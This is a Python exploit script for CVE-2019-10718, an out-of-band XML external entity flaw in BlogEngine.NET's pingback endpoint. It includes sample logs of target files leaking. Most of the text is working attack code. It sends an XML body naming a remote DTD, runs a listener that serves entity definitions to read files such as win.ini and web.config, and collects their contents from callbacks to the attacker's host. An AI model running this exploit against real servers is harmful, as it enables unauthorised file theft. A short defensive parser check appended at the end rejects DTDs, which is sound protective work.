#The application will request the remote DTD and submit a subsequent request
#containing the contents of the file:
#~~~
#$RHOST - - [17/May/2019 12:03:32] "GET /ex.dtd HTTP/1.1" 200 -
#$RHOST - - [17/May/2019 12:03:32] "GET
#/X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1
#HTTP/1.1" 200 -
#~~~

#!/usr/bin/env python3
import argparse
import http.server
import json
import multiprocessing
import os
import re
import requests
import sys
import time
import urllib.parse

"""
Exploit for CVE-2019-10718
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop

Submit an XML to the target, get the contents of the file in a follow up request from the target

python3 CVE-2019-10718.py --rhost http://$RHOST --lhost $LHOST --lport $LPORT --files C:/Windows/win.ini C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config C:/inetpub/wwwroot/iisstart.htm C:/Windows/iis.log C:/Users/Public/test.txt

Requesting C:/Windows/win.ini ...
$RHOST - - [16/May/2019 17:07:25] "GET /ex.dtd HTTP/1.1" 200 -
$RHOST - - [16/May/2019 17:07:25] "GET /X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 200 -

Requesting C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config ...
$RHOST - - [16/May/2019 17:07:26] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config

Requesting C:/inetpub/wwwroot/iisstart.htm ...
$RHOST - - [16/May/2019 17:07:30] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/inetpub/wwwroot/iisstart.htm

Requesting C:/Windows/iis.log ...
$RHOST - - [16/May/2019 17:07:34] "GET /ex.dtd HTTP/1.1" 200 -
Unable to read C:/Windows/iis.log

Requesting C:/Users/Public/test.txt ...
$RHOST - - [16/May/2019 17:07:38] "GET /ex.dtd HTTP/1.1" 200 -
$RHOST - - [16/May/2019 17:07:38] "GET /X?This%20is%20a%20test HTTP/1.1" 200 -
"""

xml = """<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{lhost}:{lport}/ex.dtd">
<foo>&e1;</foo>
<methodName>pingback.ping</methodName>
"""

dtd = """<!ENTITY % p1 SYSTEM "file:///{fname}">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://{lhost}:{lport}/X?%p1;'>">
%p2;
"""

proxies = {
    "http": "127.0.0.1:8080",
    "https": "127.0.0.1:8080"
}

file_queue = multiprocessing.Queue()
response_queue = multiprocessing.Queue()
response_counter = multiprocessing.Value('i', 0)

class S(http.server.SimpleHTTPRequestHandler):
    server_version = 'A Patchey Webserver'
    sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078'
    error_message_format = 'Donde esta la biblioteca?'

    def _set_headers(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/xml')
        self.end_headers()

    def do_GET(self):
        if self.path.endswith(".dtd"):
            # serve the DTD for the next queued file name
            self._set_headers()
            self.wfile.write(dtd.format(fname=file_queue.get(), lhost=self.lhost, lport=self.lport).encode('utf-8'))
        elif self.path.startswith("/X"):
            # the target's follow-up request carrying the file contents in the path
            self._set_headers()
            response_counter.value += 1
            response_queue.put(self.path)
            self.wfile.write('<response>Thanks</response>'.encode('utf-8'))
        else:
            self._set_headers()
            self.wfile.write('<error>?</error>'.encode('utf-8'))

def start_server(lhost, lport, server):
    httpd = http.server.HTTPServer((lhost, lport), server)
    httpd.serve_forever()

def main(rhost, lhost, lport, files, timeout, proxy, output_dir):
    print(output_dir)
    if not output_dir:
        return
    for f in files:
        file_queue.put_nowait(f)
    server = S
    server.lhost, server.lport = lhost, lport
    p = multiprocessing.Process(target=start_server, args=(lhost,lport,server))
    p.start()
    for num, f in enumerate(files):
        print("\nRequesting {} ...".format(f))
        count = 0
        r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport),
                          proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"})
        response = True
        # wait until the listener has seen one more /X? callback, or give up after timeout seconds
        while num == response_counter.value:
            if count >= timeout:
                response = False
                response_counter.value += 1
                print("Unable to read {}".format(f))
                break
            time.sleep(1)
            count += 1
        if response:
            os.makedirs(output_dir, exist_ok=True)
            with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh:
                fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?',''))
    p.terminate()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE')
    parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host')
    parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host')
    parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port')
    parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST')
    parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file')
    parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy')
    parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory. Default ./CVE-2019-10718')
    args = parser.parse_args()
    if isinstance(args.files, str):
        args.files = [args.files]
    main(args.rhost, args.lhost, args.lport, args.files, args.timeout, args.proxy, args.output)
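As an added example from the defender's side (not part of the advisory, and written in Python with the stdlib expat parser rather than BlogEngine.NET's C#): the gate a pingback endpoint needs in front of its XML parser. Any body carrying a DOCTYPE, entity declaration or external reference is refused before the parser continues, so the remote DTD described above is never fetched; the listener host and the pingback parameters in the sample bodies are placeholders.

```python
import xml.parsers.expat


class DtdRejected(Exception):
    """Raised from a handler the moment a DTD construct is seen."""


def is_safe_xml(xml_bytes):
    """True only if the body is well-formed and carries no DOCTYPE, entity
    declaration or external reference. Parsing aborts at the first DTD
    construct, so no external resource is ever requested."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected("DOCTYPE %s sysid=%r" % (name, sysid))

    def on_entity(*_):
        raise DtdRejected("entity declaration")

    def on_external_ref(*_):
        raise DtdRejected("external entity reference")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_bytes, True)
    except (DtdRejected, xml.parsers.expat.ExpatError):
        return False  # DTD present, or not well-formed: reject either way
    return True


# Constructed sample bodies: a legitimate pingback.ping call, and the
# advisory's out-of-band payload with a placeholder listener filled in.
BENIGN_PINGBACK = (b'<?xml version="1.0"?><methodCall>'
                   b'<methodName>pingback.ping</methodName>'
                   b'<params><param><value>http://example.org/a</value></param>'
                   b'<param><value>http://example.org/b</value></param></params>'
                   b'</methodCall>')
XXE_PINGBACK = (b'<?xml version="1.0"?>\n'
                b'<!DOCTYPE foo SYSTEM "http://listener.invalid:8000/ex.dtd">\n'
                b'<foo>&e1;</foo>\n<methodName>pingback.ping</methodName>\n')
```

Rejecting every DTD, internal subsets included, is deliberate: a pingback request has no legitimate use for one, and it removes the parameter-entity trick the advisory's ex.dtd relies on.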